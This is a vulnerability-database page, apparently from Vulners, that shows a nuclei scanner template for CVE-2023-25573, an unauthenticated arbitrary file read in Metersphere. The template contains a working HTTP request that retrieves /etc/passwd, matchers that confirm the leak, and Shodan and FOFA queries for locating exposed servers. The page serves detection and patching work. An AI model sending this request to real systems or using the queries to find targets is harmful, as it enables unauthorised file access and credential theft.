Lucene search
K

Metersphere - Arbitrary File Read

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Metersphere - Arbitrary File Read, allows unauthorized access to sensitive dat

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-25573
9 Mar 202320:20
circl
CNNVD
MeterSphere 安全漏洞
9 Mar 202300:00
cnnvd
CVE
CVE-2023-25573
9 Mar 202316:33
cve
Cvelist
CVE-2023-25573 Improper access control to download file in metersphere
9 Mar 202316:33
cvelist
NVD
CVE-2023-25573
9 Mar 202317:15
nvd
OSV
CVE-2023-25573 Improper access control to download file in metersphere
9 Mar 202316:33
osv
Prion
Improper access control
9 Mar 202317:15
prion
RedhatCVE
CVE-2023-25573
9 Jan 202609:02
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-25573
4 Dec 202300:00
vulncheck_kev
Vulnrichment
CVE-2023-25573 Improper access control to download file in metersphere
9 Mar 202316:33
vulnrichment
Rows per page
id: CVE-2023-25573

info:
  name: Metersphere - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data.
  remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25573
    - https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h
    - https://github.com/20142995/sectool
    - https://github.com/KayCHENvip/vulnerability-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-25573
    cwe-id: CWE-862
    epss-score: 0.49851
    epss-percentile: 0.98758
    cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: metersphere
    product: metersphere
    shodan-query: http.html:"metersphere"
    fofa-query:
      - body="Metersphere"
      - body="metersphere"
      - title="metersphere"
  tags: cve,cve2023,metersphere,lfi,vkev,vuln
variables:
  str: "{{rand_base(4)}}"
  rand: "{{rand_base(3)}}"

http:
  - raw:
      - |
        POST /api/jmeter/download/files HTTP/1.1
        Content-Type: application/json

        {"reportId":"{{str}}","bodyFiles":[{"id":"{{rand}}","name":"/etc/passwd"}]}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '/etc/passwd'

      - type: word
        part: header
        words:
          - 'filename="{{str}}.zip"'
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c9fc7cea6e358ef70ff0d4ff5a641f15c2cee0875cd4346c8c7966ab5e914210022000f2c7f4018fde48215571c2cc0ff23838139101c02ad2c83dc05b7696d08dfd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.17.5 - 8.6
EPSS0.49851
SSVC
26